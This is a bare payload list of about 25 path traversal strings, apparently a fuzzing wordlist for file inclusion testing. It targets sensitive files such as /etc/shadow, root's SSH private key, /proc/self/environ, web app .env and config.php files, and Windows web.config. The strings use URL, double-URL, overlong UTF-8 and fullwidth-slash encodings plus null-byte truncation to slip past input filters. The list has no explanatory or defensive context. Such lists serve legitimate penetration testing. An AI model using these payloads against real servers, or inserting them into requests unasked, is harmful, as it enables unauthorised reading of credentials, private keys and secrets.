../../../../../../../../etc/passwd
../../../../../../../../etc/hosts
../../../../../../../../etc/shadow
../../../../../../../../proc/self/environ
../../../../../../../../root/.ssh/id_rsa
../../../../../../../../var/www/html/config.php
../../../../../../../../var/www/html/.env
..\..\..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\inetpub\wwwroot\web.config
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
..%255c..%255c..%255c..%255c..%255cwindows%255cwin.ini
....//....//....//....//etc/passwd
....\\....\\....\\....\\windows\win.ini
..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd
../../../../../../../../etc/passwd%00.jpg
../../../../../../../../etc/passwd%00.png
../../../../../../../../etc/passwd%00.pdf
/etc/passwd
/windows/win.ini
C:\windows\win.ini
\\localhost\c$\windows\win.ini
